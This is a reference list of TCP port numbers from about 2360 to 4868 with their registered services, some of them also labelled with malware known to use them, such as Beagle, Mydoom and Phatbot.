TCP 2360 NexstorIndLtd
TCP 2361 TL1
TCP 2362 digiman
TCP 2363 Media Central NFSD
TCP 2364 OI-2000
TCP 2365 dbref
TCP 2366 qip-login
TCP 2367 Service Control
TCP 2368 OpenTable
TCP 2369 ACS2000 DSP
TCP 2370 L3-HBMon
TCP 2381 Compaq HTTPS
TCP 2382 Microsoft OLAP
TCP 2383 Microsoft OLAP
TCP 2384 SD-REQUEST
TCP 2389 OpenView Session Mgr
TCP 2390 RSMTP
TCP 2391 3COM Net Management
TCP 2392 Tactical Auth
TCP 2393 MS OLAP 1
TCP 2394 MS OLAP 2
TCP 2395 LAN900 Remote
TCP 2396 Wusage
TCP 2397 NCL
TCP 2398 Orbiter
TCP 2399 FileMaker Inc. - Data Access Layer
TCP 2400 OpEquus Server
TCP 2401 cvspserver
TCP 2402 TaskMaster 2000 Server
TCP 2403 TaskMaster 2000 Web
TCP 2404 IEC870-5-104
TCP 2405 TRC Netpoll
TCP 2406 JediServer
TCP 2407 Orion
TCP 2408 OptimaNet
TCP 2409 SNS Protocol
TCP 2410 VRTS Registry
TCP 2411 Netwave AP Management
TCP 2412 CDN
TCP 2413 orion-rmi-reg
TCP 2414 Interlingua
TCP 2415 COMTEST
TCP 2416 RMT Server
TCP 2417 Composit Server
TCP 2418 cas
TCP 2419 Attachmate S2S
TCP 2420 DSL Remote Management
TCP 2421 G-Talk
TCP 2422 CRMSBITS
TCP 2423 RNRP
TCP 2424 KOFAX-SVR
TCP 2425 Fujitsu App Manager
TCP 2426 Appliant TCP
TCP 2427 Media Gateway Control Protocol Gateway
TCP 2428 One Way Trip Time
TCP 2429 FT-ROLE
TCP 2430 venus
TCP 2431 venus-se
TCP 2432 codasrv
TCP 2433 codasrv-se
TCP 2434 pxc-epmap
TCP 2435 OptiLogic
TCP 2436 TOP/X
TCP 2437 UniControl
TCP 2438 MSP
TCP 2439 SybaseDBSynch
TCP 2440 Spearway Lockers
TCP 2441 pvsw-inet
TCP 2442 Netangel
TCP 2443 PowerClient Central Storage Facility
TCP 2444 BT PP2 Sectrans
TCP 2445 DTN1
TCP 2446 bues_service
TCP 2447 OpenView NNM daemon
TCP 2448 hpppsvr
TCP 2449 RATL
TCP 2450 netadmin
TCP 2451 netchat
TCP 2452 SnifferClient
TCP 2453 madge-om
TCP 2454 IndX-DDS
TCP 2455 WAGO-IO-SYSTEM
TCP 2456 altav-remmgt
TCP 2457 Rapido_IP
TCP 2458 griffin
TCP 2459 Community
TCP 2460 ms-theater
TCP 2461 qadmifoper
TCP 2462 qadmifevent
TCP 2463 Symbios Raid
TCP 2464 DirecPC SI
TCP 2465 Load Balance Management
TCP 2466 Load Balance Forwarding
TCP 2467 High Criteria
TCP 2468 qip_msgd
TCP 2469 MTI-TCS-COMM
TCP 2470 taskman port
TCP 2471 SeaODBC
TCP 2472 C3
TCP 2473 Aker-cdp
TCP 2474 Vital Analysis
TCP 2475 ACE Server
TCP 2476 ACE Server Propagation
TCP 2477 SecurSight Certificate Valifation Service
TCP 2478 SecurSight Authentication Server (SLL)
TCP 2479 SecurSight Event Logging Server (SSL)
TCP 2480 Lingwood's Detail
TCP 2481 Oracle GIOP
TCP 2482 Oracle GIOP SSL
TCP 2483 Oracle TTC
TCP 2484 Oracle TTC SSL
TCP 2485 Net Objects1
TCP 2486 Net Objects2
TCP 2487 Policy Notice Service
TCP 2488 Moy Corporation
TCP 2489 TSILB
TCP 2490 qip_qdhcp
TCP 2491 Conclave CPP
TCP 2492 GROOVE
TCP 2493 Talarian MQS
TCP 2494 BMC AR
TCP 2495 Fast Remote Services
TCP 2496 DIRGIS
TCP 2497 Quad DB
TCP 2498 ODN-CasTraq
TCP 2499 UniControl
TCP 2500 Resource Tracking system server
TCP 2501 Resource Tracking system client
TCP 2502 Kentrox Protocol
TCP 2503 NMS-DPNSS
TCP 2504 WLBS
TCP 2505 torque-traffic
TCP 2506 jbroker
TCP 2507 spock
TCP 2508 JDataStore
TCP 2509 fjmpss
TCP 2510 fjappmgrbulk
TCP 2511 Metastorm
TCP 2512 Citrix IMA
TCP 2513 Citrix ADMIN
TCP 2514 Facsys NTP
TCP 2515 Facsys Router
TCP 2516 Main Control
TCP 2517 H.323 Annex E call signaling transport
TCP 2518 Willy
TCP 2519 globmsgsvc
TCP 2520 pvsw
TCP 2521 Adaptec Manager
TCP 2522 WinDb
TCP 2523 Qke LLC V.3
TCP 2524 Optiwave License Management
TCP 2525 MS V-Worlds
TCP 2526 EMA License Manager
TCP 2527 IQ Server
TCP 2528 NCR CCL
TCP 2529 UTS FTP
TCP 2530 VR Commerce
TCP 2531 ITO-E GUI
TCP 2532 OVTOPMD
TCP 2533 SnifferServer
TCP 2534 Combox Web Access
TCP 2535 W32.Beagle trojan / MADCAP
TCP 2536 btpp2audctr1
TCP 2537 Upgrade Protocol
TCP 2538 vnwk-prapi
TCP 2539 VSI Admin
TCP 2540 LonWorks
TCP 2541 LonWorks2
TCP 2542 daVinci
TCP 2543 REFTEK
TCP 2544 Novell ZEN
TCP 2545 sis-emt
TCP 2546 vytalvaultbrtp
TCP 2547 vytalvaultvsmp
TCP 2548 vytalvaultpipe
TCP 2549 IPASS
TCP 2550 ADS
TCP 2551 ISG UDA Server
TCP 2552 Call Logging
TCP 2553 efidiningport
TCP 2554 VCnet-Link v10
TCP 2555 Compaq WCP
TCP 2556 W32.Beagle.N trojan / MADCAP / nicetec-nmsvc
TCP 2557 nicetec-mgmt
TCP 2558 PCLE Multi Media
TCP 2559 LSTP
TCP 2560 labrat
TCP 2561 MosaixCC
TCP 2562 Delibo
TCP 2563 CTI Redwood
TCP 2564 HP 3000 NS/VT block mode telnet
TCP 2565 Coordinator Server
TCP 2566 pcs-pcw
TCP 2567 Cisco Line Protocol
TCP 2568 SPAM TRAP
TCP 2569 Sonus Call Signal
TCP 2570 HS Port
TCP 2571 CECSVC
TCP 2572 IBP
TCP 2573 Trust Establish
TCP 2574 Blockade BPSP
TCP 2575 HL7
TCP 2576 TCL Pro Debugger
TCP 2577 Scriptics Lsrvr
TCP 2578 RVS ISDN DCP
TCP 2579 mpfoncl
TCP 2580 Tributary
TCP 2581 ARGIS TE
TCP 2582 ARGIS DS
TCP 2583 MON / Wincrash2
TCP 2584 cyaserv
TCP 2585 NETX Server
TCP 2586 NETX Agent
TCP 2587 MASC
TCP 2588 Privilege
TCP 2589 quartus tcl
TCP 2590 idotdist
TCP 2591 Maytag Shuffle
TCP 2592 netrek
TCP 2593 MNS Mail Notice Service
TCP 2594 Data Base Server
TCP 2595 World Fusion 1
TCP 2596 World Fusion 2
TCP 2597 Homestead Glory
TCP 2598 Citrix MA Client
TCP 2599 Meridian Data
TCP 2600 HPSTGMGR
TCP 2601 discp client
TCP 2602 discp server
TCP 2603 Service Meter
TCP 2604 NSC CCS
TCP 2605 NSC POSA
TCP 2606 Dell Netmon
TCP 2607 Dell Connection
TCP 2608 Wag Service
TCP 2609 System Monitor
TCP 2610 VersaTek
TCP 2611 LIONHEAD
TCP 2612 Qpasa Agent
TCP 2613 SMNTUBootstrap
TCP 2614 Never Offline
TCP 2615 firepower
TCP 2616 appswitch-emp
TCP 2617 Clinical Context Managers
TCP 2618 Priority E-Com
TCP 2619 bruce
TCP 2620 LPSRecommender
TCP 2621 Miles Apart Jukebox Server
TCP 2622 MetricaDBC
TCP 2623 LMDP
TCP 2624 Aria
TCP 2625 Blwnkl Port
TCP 2626 gbjd816
TCP 2627 Moshe Beeri
TCP 2628 DICT
TCP 2629 Sitara Server
TCP 2630 Sitara Management
TCP 2631 Sitara Dir
TCP 2632 IRdg Post
TCP 2633 InterIntelli
TCP 2634 PK Electronics
TCP 2635 Back Burner
TCP 2636 Solve
TCP 2637 Import Document Service
TCP 2638 Sybase Anywhere
TCP 2639 AMInet
TCP 2640 Sabbagh Associates Licence Manager
TCP 2641 HDL Server
TCP 2642 Tragic
TCP 2643 GTE-SAMP
TCP 2644 Travsoft IPX Tunnel
TCP 2645 Novell IPX CMD
TCP 2646 AND Licence Manager
TCP 2647 SyncServer
TCP 2648 Upsnotifyprot
TCP 2649 VPSIPPORT
TCP 2650 eristwoguns
TCP 2651 EBInSite
TCP 2652 InterPathPanel
TCP 2653 Sonus
TCP 2654 Corel VNC Admin
TCP 2655 UNIX Nt Glue
TCP 2656 Kana
TCP 2657 SNS Dispatcher
TCP 2658 SNS Admin
TCP 2659 SNS Query
TCP 2660 GC Monitor
TCP 2661 OLHOST
TCP 2662 BinTec-CAPI
TCP 2663 BinTec-TAPI
TCP 2664 Command MQ GM
TCP 2665 Command MQ PM
TCP 2666 extensis
TCP 2667 Alarm Clock Server
TCP 2668 Alarm Clock Client
TCP 2669 TOAD
TCP 2670 TVE Announce
TCP 2671 newlixreg
TCP 2672 nhserver
TCP 2673 First Call 42
TCP 2674 ewnn
TCP 2675 TTC ETAP
TCP 2676 SIMSLink
TCP 2677 Gadget Gate 1 Way
TCP 2678 Gadget Gate 2 Way
TCP 2679 Sync Server SSL
TCP 2680 pxc-sapxom
TCP 2681 mpnjsomb
TCP 2682 SRSP
TCP 2683 NCDLoadBalance
TCP 2684 mpnjsosv
TCP 2685 mpnjsocl
TCP 2686 mpnjsomg
TCP 2687 pq-lic-mgmt
TCP 2688 md-cf-HTTP
TCP 2689 FastLynx
TCP 2690 HP NNM Embedded Database
TCP 2691 IT Internet
TCP 2692 Admins LMS
TCP 2693 belarc-HTTP
TCP 2694 pwrsevent
TCP 2695 VSPREAD
TCP 2696 Unify Admin
TCP 2697 Oce SNMP Trap Port
TCP 2698 MCK-IVPIP
TCP 2699 Csoft Plus Client
TCP 2700 tqdata
TCP 2701 SMS Remote Control (control)
TCP 2702 SMS Remote Control (data)
TCP 2703 SMS Remote Control (chat)
TCP 2704 SMS Remote File Transfer
TCP 2705 SDS Admin
TCP 2706 NCD Mirroring
TCP 2707 EMCSYMAPIPORT
TCP 2708 Banyan-Net
TCP 2709 Supermon
TCP 2710 SSO Service
TCP 2711 SSO Control
TCP 2712 Axapta Object Communication Protocol
TCP 2713 Raven1
TCP 2714 Raven2
TCP 2715 HPSTGMGR2
TCP 2716 Inova IP Disco
TCP 2717 PN REQUESTER
TCP 2718 PN REQUESTER 2
TCP 2719 Scan & Change
TCP 2720 wkars
TCP 2721 Smart Diagnose
TCP 2722 Proactive Server
TCP 2723 WatchDog NT
TCP 2724 qotps
TCP 2725 SQL Analysis Services / MSOLAP PTP2
TCP 2726 TAMS
TCP 2727 Media Gateway Control Protocol Call Agent
TCP 2728 SQDR
TCP 2729 TCIM Control
TCP 2730 NEC RaidPlus
TCP 2731 NetDragon Messanger
TCP 2732 G5M
TCP 2733 Signet CTF
TCP 2734 CCS Software
TCP 2735 Monitor Console
TCP 2736 RADWIZ NMS SRV
TCP 2737 SRP Feedback
TCP 2738 NDL TCP-OSI Gateway
TCP 2739 TN Timing
TCP 2740 Alarm
TCP 2741 TSB
TCP 2742 TSB2
TCP 2743 murx
TCP 2744 honyaku
TCP 2745 W32.Beagle.C trojan) / URBISNET
TCP 2746 CPUDPENCAP
TCP 2747 yk.fujitsu.co.jp
TCP 2748 yk.fujitsu.co.jp
TCP 2749 yk.fujitsu.co.jp
TCP 2750 yk.fujitsu.co.jp
TCP 2751 yk.fujitsu.co.jp
TCP 2752 RSISYS ACCESS
TCP 2753 de-spot
TCP 2754 APOLLO CC
TCP 2755 Express Pay
TCP 2756 simplement-tie
TCP 2757 CNRP
TCP 2758 APOLLO Status
TCP 2759 APOLLO GMS
TCP 2760 Saba MS
TCP 2761 DICOM ISCL
TCP 2762 DICOM TLS
TCP 2763 Desktop DNA
TCP 2764 Data Insurance
TCP 2765 qip-audup
TCP 2766 Compaq SCP
TCP 2767 UADTC
TCP 2768 UACS
TCP 2769 Single Point MVS
TCP 2770 Veronica
TCP 2771 Vergence CM
TCP 2772 auris
TCP 2773 PC Backup
TCP 2774 PC Backup
TCP 2775 SMMP
TCP 2776 Ridgeway Systems & Software
TCP 2777 Ridgeway Systems & Software
TCP 2778 Gwen-Sonya
TCP 2779 LBC Sync
TCP 2780 LBC Control
TCP 2781 whosells
TCP 2782 everydayrc
TCP 2783 AISES
TCP 2784 world wide web - development
TCP 2785 aic-np
TCP 2786 aic-oncrpc - Destiny MCD database
TCP 2787 piccolo - Cornerstone Software
TCP 2788 NetWare Loadable Module - Seagate Software
TCP 2789 Media Agent
TCP 2790 PLG Proxy
TCP 2791 MT Port Registrator
TCP 2792 f5-globalsite
TCP 2793 initlsmsad
TCP 2794 aaftp
TCP 2795 LiveStats
TCP 2796 ac-tech
TCP 2797 esp-encap
TCP 2798 TMESIS-UPShot
TCP 2799 ICON Discover
TCP 2800 ACC RAID
TCP 2801 IGCP
TCP 2802 Veritas TCP1
TCP 2803 btprjctrl
TCP 2804 Telexis VTU
TCP 2805 WTA WSP-S
TCP 2806 cspuni
TCP 2807 cspmulti
TCP 2808 J-LAN-P
TCP 2809 CORBA LOC
TCP 2810 Active Net Steward
TCP 2811 GSI FTP
TCP 2812 atmtcp
TCP 2813 llm-pass
TCP 2814 llm-csv
TCP 2815 LBC Measurement
TCP 2816 LBC Watchdog
TCP 2817 NMSig Port
TCP 2818 rmlnk
TCP 2819 FC Fault Notification
TCP 2820 UniVision
TCP 2821 vml_dms
TCP 2822 ka0wuc
TCP 2823 CQG Net/LAN
TCP 2826 slc systemlog
TCP 2827 slc ctrlrloops
TCP 2828 ITM License Manager
TCP 2829 silkp1
TCP 2830 silkp2
TCP 2831 silkp3
TCP 2832 silkp4
TCP 2833 glishd
TCP 2834 EVTP
TCP 2835 EVTP-DATA
TCP 2836 catalyst
TCP 2837 Repliweb
TCP 2838 Starbot
TCP 2839 NMSigPort
TCP 2840 l3-exprt
TCP 2841 l3-ranger
TCP 2842 l3-hawk
TCP 2843 PDnet
TCP 2844 BPCP POLL
TCP 2845 BPCP TRAP
TCP 2846 AIMPP Hello
TCP 2847 AIMPP Port Req
TCP 2848 AMT-BLC-PORT
TCP 2849 FXP
TCP 2850 MetaConsole
TCP 2851 webemshttp
TCP 2852 bears-01
TCP 2853 ISPipes
TCP 2854 InfoMover
TCP 2856 cesdinv
TCP 2857 SimCtIP
TCP 2858 ECNP
TCP 2859 Active Memory
TCP 2860 Dialpad Voice 1
TCP 2861 Dialpad Voice 2
TCP 2862 TTG Protocol
TCP 2863 Sonar Data
TCP 2864 main 5001 cmd
TCP 2865 pit-vpn
TCP 2866 lwlistener
TCP 2867 esps-portal
TCP 2868 NPEP Messaging
TCP 2869 SSDP event notification / ICSLAP
TCP 2870 daishi
TCP 2871 MSI Select Play
TCP 2872 CONTRACT
TCP 2873 PASPAR2 ZoomIn
TCP 2874 dxmessagebase1
TCP 2875 dxmessagebase2
TCP 2876 SPS Tunnel
TCP 2877 BLUELANCE
TCP 2878 AAP
TCP 2879 ucentric-ds
TCP 2880 synapse
TCP 2881 NDSP
TCP 2882 NDTP
TCP 2883 NDNP
TCP 2884 Flash Msg
TCP 2885 TopFlow
TCP 2886 RESPONSELOGIC
TCP 2887 aironet
TCP 2888 SPCSDLOBBY
TCP 2889 RSOM
TCP 2890 CSPCLMULTI
TCP 2891 CINEGRFX-ELMD License Manager
TCP 2892 SNIFFERDATA
TCP 2893 VSECONNECTOR
TCP 2894 ABACUS-REMOTE
TCP 2895 NATUS LINK
TCP 2896 ECOVISIONG6-1
TCP 2897 Citrix RTMP
TCP 2898 APPLIANCE-CFG
TCP 2899 case.nm.fujitsu.co.jp
TCP 2900 magisoft.com
TCP 2901 ALLSTORCNS
TCP 2902 NET ASPI
TCP 2903 SUITCASE
TCP 2904 M2UA
TCP 2905 M3UA
TCP 2906 CALLER9
TCP 2907 WEBMETHODS B2B
TCP 2908 mao
TCP 2909 Funk Dialout
TCP 2910 TDAccess
TCP 2911 Blockade
TCP 2912 Epicon
TCP 2913 Booster Ware
TCP 2914 Game Lobby
TCP 2915 TK Socket
TCP 2916 Elvin Server
TCP 2917 Elvin Client
TCP 2918 Kasten Chase Pad
TCP 2919 ROBOER
TCP 2920 ROBOEDA
TCP 2921 CESD Contents Delivery Management
TCP 2922 CESD Contents Delivery Data Transfer
TCP 2923 WTA-WSP-WTP-S
TCP 2924 PRECISE-VIP
TCP 2925 Firewall Redundancy Protocol
TCP 2926 MOBILE-FILE-DL
TCP 2927 UNIMOBILECTRL
TCP 2928 REDSTONE-CPSS
TCP 2929 PANJA-WEBADMIN
TCP 2930 PANJA-WEBLINX
TCP 2931 Circle-X
TCP 2932 INCP
TCP 2933 4-TIER OPM GW
TCP 2934 4-TIER OPM CLI
TCP 2935 QTP
TCP 2936 OTPatch
TCP 2937 PNACONSULT-LM
TCP 2938 SM-PAS-1
TCP 2939 SM-PAS-2
TCP 2940 SM-PAS-3
TCP 2941 SM-PAS-4
TCP 2942 SM-PAS-5
TCP 2943 TTNRepository
TCP 2944 Megaco H-248
TCP 2945 H248 Binary
TCP 2946 FJSVmpor
TCP 2947 GPSD
TCP 2948 WAP PUSH
TCP 2949 WAP PUSH SECURE
TCP 2950 ESIP
TCP 2951 OTTP
TCP 2952 MPFWSAS
TCP 2953 OVALARMSRV
TCP 2954 OVALARMSRV-CMD
TCP 2955 CSNOTIFY
TCP 2956 OVRIMOSDBMAN
TCP 2957 JAMCT5
TCP 2958 JAMCT6
TCP 2959 RMOPAGT
TCP 2960 DFOXSERVER
TCP 2961 BOLDSOFT-LM
TCP 2962 IPH-POLICY-CLI
TCP 2963 IPH-POLICY-ADM
TCP 2964 BULLANT SRAP
TCP 2965 BULLANT RAP
TCP 2966 IDP-INFOTRIEVE
TCP 2967 SSC-AGENT
TCP 2968 ENPP
TCP 2969 UPnP / ESSP
TCP 2970 INDEX-NET
TCP 2971 Net Clip
TCP 2972 PMSM Webrctl
TCP 2973 SV Networks
TCP 2974 Signal
TCP 2975 Fujitsu Configuration Management Service
TCP 2976 CNS Server Port
TCP 2977 TTCs Enterprise Test Access Protocol - NS
TCP 2978 TTCs Enterprise Test Access Protocol - DS
TCP 2979 H.263 Video Streaming
TCP 2980 Instant Messaging Service
TCP 2981 MYLXAMPORT
TCP 2982 IWB-WHITEBOARD
TCP 2983 NETPLAN
TCP 2984 HPIDSADMIN
TCP 2985 HPIDSAGENT
TCP 2986 STONEFALLS
TCP 2987 IDENTIFY
TCP 2988 CLASSIFY
TCP 2989 ZARKOV
TCP 2990 BOSCAP
TCP 2991 WKSTN-MON
TCP 2992 ITB301
TCP 2993 VERITAS VIS1
TCP 2994 VERITAS VIS2
TCP 2995 IDRS
TCP 2996 vsixml
TCP 2997 REBOL
TCP 2998 Real Secure
TCP 2999 RemoteWare Unassigned
TCP 3000 RemoteWare Client
TCP 3001 Phatbot Worm / Redwood Broker
TCP 3002 RemoteWare Server
TCP 3003 CGMS
TCP 3004 Csoft Agent
TCP 3005 Genius License Manager
TCP 3006 Instant Internet Admin
TCP 3007 Lotus Mail Tracking Agent Protocol
TCP 3008 Midnight Technologies
TCP 3009 PXC-NTFY
TCP 3010 Telerate Workstation
TCP 3011 Trusted Web
TCP 3012 Trusted Web Client
TCP 3013 Gilat Sky Surfer
TCP 3014 Broker Service
TCP 3015 NATI DSTP
TCP 3016 Notify Server
TCP 3017 Event Listener
TCP 3018 Service Registry
TCP 3019 Resource Manager
TCP 3020 CIFS
TCP 3021 AGRI Server
TCP 3022 CSREGAGENT
TCP 3023 magicnotes
TCP 3024 NDS_SSO
TCP 3025 Arepa Raft
TCP 3026 AGRI Gateway
TCP 3027 LiebDevMgmt_C
TCP 3028 LiebDevMgmt_DM
TCP 3029 LiebDevMgmt_A
TCP 3030 Arepa Cas
TCP 3031 AgentVU
TCP 3032 Redwood Chat
TCP 3033 PDB
TCP 3034 Osmosis AEEA
TCP 3035 FJSV gssagt
TCP 3036 Hagel DUMP
TCP 3037 HP SAN Mgmt
TCP 3038 Santak UPS
TCP 3039 Cogitate Inc.
TCP 3040 Tomato Springs
TCP 3041 di-traceware
TCP 3042 journee
TCP 3043 BRP
TCP 3045 ResponseNet
TCP 3046 di-ase
TCP 3047 Fast Security HL Server
TCP 3048 Sierra Net PC Trader
TCP 3049 NSWS
TCP 3050 gds_db
TCP 3051 Galaxy Server
TCP 3052 APCPCNS
TCP 3053 dsom-server
TCP 3054 AMT CNF PROT
TCP 3055 Policy Server
TCP 3056 CDL Server
TCP 3057 GoAhead FldUp
TCP 3058 videobeans
TCP 3059 qsoft
TCP 3060 interserver
TCP 3061 cautcpd
TCP 3062 ncacn-ip-tcp
TCP 3063 ncadg-ip-udp
TCP 3065 slinterbase
TCP 3066 NETATTACHSDMP
TCP 3067 W32.Korgo Worm / FJHPJP
TCP 3068 ls3 Broadcast
TCP 3069 ls3
TCP 3070 MGXSWITCH
TCP 3075 Orbix 2000 Locator
TCP 3076 Orbix 2000 Config
TCP 3077 Orbix 2000 Locator SSL
TCP 3078 Orbix 2000 Locator SSL
TCP 3079 LV Front Panel
TCP 3080 stm_pproc
TCP 3081 TL1-LV
TCP 3082 TL1-RAW
TCP 3083 TL1-TELNET
TCP 3084 ITM-MCCS
TCP 3085 PCIHReq
TCP 3086 JDL-DBKitchen
TCP 3105 Cardbox
TCP 3106 Cardbox HTTP
TCP 3127 W32.Mydoom.A virus
TCP 3128 Squid HTTP Proxy / W32.Mydoom.B virus
TCP 3129 Master's Paradise (Windows Trojan)
TCP 3130 ICPv2
TCP 3131 Net Book Mark
TCP 3141 VMODEM
TCP 3142 RDC WH EOS
TCP 3143 Sea View
TCP 3144 Tarantella
TCP 3145 CSI-LFAP
TCP 3147 RFIO
TCP 3148 NetMike Game Administrator
TCP 3149 NetMike Game Server
TCP 3150 NetMike Assessor Administrator
TCP 3151 NetMike Assessor
TCP 3180 Millicent Broker Server
TCP 3181 BMC Patrol Agent
TCP 3182 BMC Patrol Rendezvous
TCP 3262 NECP
TCP 3264 cc:mail/lotus
TCP 3265 Altav Tunnel
TCP 3266 NS CFG Server
TCP 3267 IBM Dial Out
TCP 3268 Microsoft Global Catalog
TCP 3269 Microsoft Global Catalog with LDAP/SSL
TCP 3270 Verismart
TCP 3271 CSoft Prev Port
TCP 3272 Fujitsu User Manager
TCP 3273 Simple Extensible Multiplexed Protocol
TCP 3274 Ordinox Server
TCP 3275 SAMD
TCP 3276 Maxim ASICs
TCP 3277 AWG Proxy
TCP 3278 LKCM Server
TCP 3279 admind
TCP 3280 VS Server
TCP 3281 SYSOPT
TCP 3282 Datusorb
TCP 3283 Net Assistant
TCP 3284 4Talk
TCP 3285 Plato
TCP 3286 E-Net
TCP 3287 DIRECTVDATA
TCP 3288 COPS
TCP 3289 ENPC
TCP 3290 CAPS LOGISTICS TOOLKIT - LM
TCP 3291 S A Holditch & Associates - LM
TCP 3292 Cart O Rama
TCP 3293 fg-fps
TCP 3294 fg-gip
TCP 3295 Dynamic IP Lookup
TCP 3296 Rib License Manager
TCP 3297 Cytel License Manager
TCP 3298 Transview
TCP 3299 pdrncs
TCP 3300 bmc-patrol-agent
TCP 3301 Unathorised use by SAP R/3
TCP 3302 MCS Fastmail
TCP 3303 OP Session Client
TCP 3304 OP Session Server
TCP 3305 ODETTE-FTP
TCP 3306 MySQL
TCP 3307 OP Session Proxy
TCP 3308 TNS Server
TCP 3309 TNS ADV
TCP 3310 Dyna Access
TCP 3311 MCNS Tel Ret
TCP 3312 Application Management Server
TCP 3313 Unify Object Broker
TCP 3314 Unify Object Host
TCP 3315 CDID
TCP 3316 AICC/CMI
TCP 3317 VSAI PORT
TCP 3318 Swith to Swith Routing Information Protocol
TCP 3319 SDT License Manager
TCP 3320 Office Link 2000
TCP 3321 VNSSTR
TCP 3325 isi.edu
TCP 3326 SFTU
TCP 3327 BBARS
TCP 3328 Eaglepoint License Manager
TCP 3329 HP Device Disc
TCP 3330 MCS Calypso ICF
TCP 3331 MCS Messaging
TCP 3332 MCS Mail Server
TCP 3333 DEC Notes
TCP 3334 Direct TV Webcasting
TCP 3335 Direct TV Software Updates
TCP 3336 Direct TV Tickers
TCP 3337 Direct TV Data Catalog
TCP 3338 OMF data b
TCP 3339 OMF data l
TCP 3340 OMF data m
TCP 3341 OMF data h
TCP 3342 WebTIE
TCP 3343 MS Cluster Net
TCP 3344 BNT Manager
TCP 3345 Influence
TCP 3346 Trnsprnt Proxy
TCP 3347 Phoenix RPC
TCP 3348 Pangolin Laser
TCP 3349 Chevin Services
TCP 3350 FINDVIATV
TCP 3351 BTRIEVE
TCP 3352 SSQL
TCP 3353 FATPIPE
TCP 3354 SUITJD
TCP 3355 Hogle (proxy backdoor) / Ordinox Dbase
TCP 3356 UPNOTIFYPS
TCP 3357 Adtech Test IP
TCP 3358 Mp Sys Rmsvr
TCP 3359 WG NetForce
TCP 3360 KV Server
TCP 3361 KV Agent
TCP 3362 DJ ILM
TCP 3363 NATI Vi Server
TCP 3364 Creative Server
TCP 3365 Content Server
TCP 3366 Creative Partner
TCP 3371 ccm.jf.intel.com
TCP 3372 Microsoft Distributed Transaction Coordinator (MSDTC) / TIP 2
TCP 3373 Lavenir License Manager
TCP 3374 Cluster Disc
TCP 3375 VSNM Agent
TCP 3376 CD Broker
TCP 3377 Cogsys Network License Manager
TCP 3378 WSICOPY
TCP 3379 SOCORFS
TCP 3380 SNS Channels
TCP 3381 Geneous
TCP 3382 Fujitsu Network Enhanced Antitheft function
TCP 3383 Enterprise Software Products License Manager
TCP 3384 Cluster Management Services
TCP 3385 qnxnetman
TCP 3386 GPRS Data
TCP 3387 Back Room Net
TCP 3388 CB Server
TCP 3389 MS Terminal Server
TCP 3390 Distributed Service Coordinator
TCP 3391 SAVANT
TCP 3392 EFI License Management
TCP 3393 D2K Tapestry Client to Server
TCP 3394 D2K Tapestry Server to Server
TCP 3395 Dyna License Manager (Elam)
TCP 3396 Printer Agent
TCP 3397 Cloanto License Manager
TCP 3398 Mercantile
TCP 3399 CSMS
TCP 3400 CSMS2
TCP 3401 filecast
TCP 3410 Backdoor.OptixPro.13
TCP 3421 Bull Apprise portmapper
TCP 3454 Apple Remote Access Protocol
TCP 3455 RSVP Port
TCP 3456 VAT default data
TCP 3457 VAT default control
TCP 3458 D3WinOsfi
TCP 3459 TIP Integral
TCP 3460 EDM Manger
TCP 3461 EDM Stager
TCP 3462 EDM STD Notify
TCP 3463 EDM ADM Notify
TCP 3464 EDM MGR Sync
TCP 3465 EDM MGR Cntrl
TCP 3466 WORKFLOW
TCP 3467 RCST
TCP 3468 TTCM Remote Controll
TCP 3469 Pluribus
TCP 3470 jt400
TCP 3471 jt400-ssl
TCP 3535 MS-LA
TCP 3563 Watcom Debug
TCP 3572 harlequin.co.uk
TCP 3672 harlequinorb
TCP 3689 Apple Digital Audio Access Protocol
TCP 3802 VHD
TCP 3845 V-ONE Single Port Proxy
TCP 3862 GIGA-POCKET
TCP 3875 PNBSCADA
TCP 3900 Unidata UDT OS
TCP 3984 MAPPER network node manager
TCP 3985 MAPPER TCP/IP server
TCP 3986 MAPPER workstation server
TCP 3987 Centerline
TCP 4000 Terabase
TCP 4001 Cisco mgmt / NewOak
TCP 4002 pxc-spvr-ft
TCP 4003 pxc-splr-ft
TCP 4004 pxc-roid
TCP 4005 pxc-pin
TCP 4006 pxc-spvr
TCP 4007 pxc-splr
TCP 4008 NetCheque accounting
TCP 4009 Chimera HWM
TCP 4010 Samsung Unidex
TCP 4011 Alternate Service Boot
TCP 4012 PDA Gate
TCP 4013 ACL Manager
TCP 4014 TAICLOCK
TCP 4015 Talarian Mcast
TCP 4016 Talarian Mcast
TCP 4017 Talarian Mcast
TCP 4018 Talarian Mcast
TCP 4019 Talarian Mcast
TCP 4045 nfs-lockd
TCP 4096 BRE (Bridge Relay Element)
TCP 4097 Patrol View
TCP 4098 drmsfsd
TCP 4099 DPCP
TCP 4132 NUTS Daemon
TCP 4133 NUTS Bootp Server
TCP 4134 NIFTY-Serve HMI protocol
TCP 4141 Workflow Server
TCP 4142 Document Server
TCP 4143 Document Replication
TCP 4144 Compuserve pc windows
TCP 4160 Jini Discovery
TCP 4199 EIMS ADMIN
TCP 4299 earth.path.net
TCP 4300 Corel CCam
TCP 4321 Remote Who Is
TCP 4333 mini-sql server
TCP 4343 UNICALL
TCP 4344 VinaInstall
TCP 4345 Macro 4 Network AS
TCP 4346 ELAN LM
TCP 4347 LAN Surveyor
TCP 4348 ITOSE
TCP 4349 File System Port Map
TCP 4350 Net Device
TCP 4351 PLCY Net Services
TCP 4353 F5 iQuery
TCP 4397 Phatbot Worm
TCP 4442 Saris
TCP 4443 Pharos
TCP 4444 AdSubtract / NV Video default
TCP 4445 UPNOTIFYP
TCP 4446 N1-FWP
TCP 4447 N1-RMGMT
TCP 4448 ASC Licence Manager
TCP 4449 PrivateWire
TCP 4450 Camp
TCP 4451 CTI System Msg
TCP 4452 CTI Program Load
TCP 4453 NSS Alert Manager
TCP 4454 NSS Agent Manager
TCP 4455 PR Chat User
TCP 4456 PR Chat Server
TCP 4457 PR Register
TCP 4500 sae-urn
TCP 4501 urn-x-cdchoice
TCP 4545 WorldScores
TCP 4546 SF License Manager (Sentinel)
TCP 4547 Lanner License Manager
TCP 4557 FAX transmission service
TCP 4559 HylaFAX client-service protocol
TCP 4567 TRAM
TCP 4568 BMC Reporting
TCP 4600 Piranha1
TCP 4601 Piranha2
TCP 4661 eDonkey2k
TCP 4662 eDonkey2k
TCP 4663 eDonkey
TCP 4665 eDonkey2k
TCP 4672 remote file access server
TCP 4675 eMule
TCP 4711 eMule
TCP 4751 W32.Beagle.V trojan
TCP 4772 eMule
TCP 4800 Icona Instant Messenging System
TCP 4801 Icona Web Embedded Chat
TCP 4802 Icona License System Server
TCP 4820 Backdoor.Tuxter
TCP 4827 HTCP
TCP 4837 Varadero-0
TCP 4838 Varadero-1
TCP 4868 Photon Relay
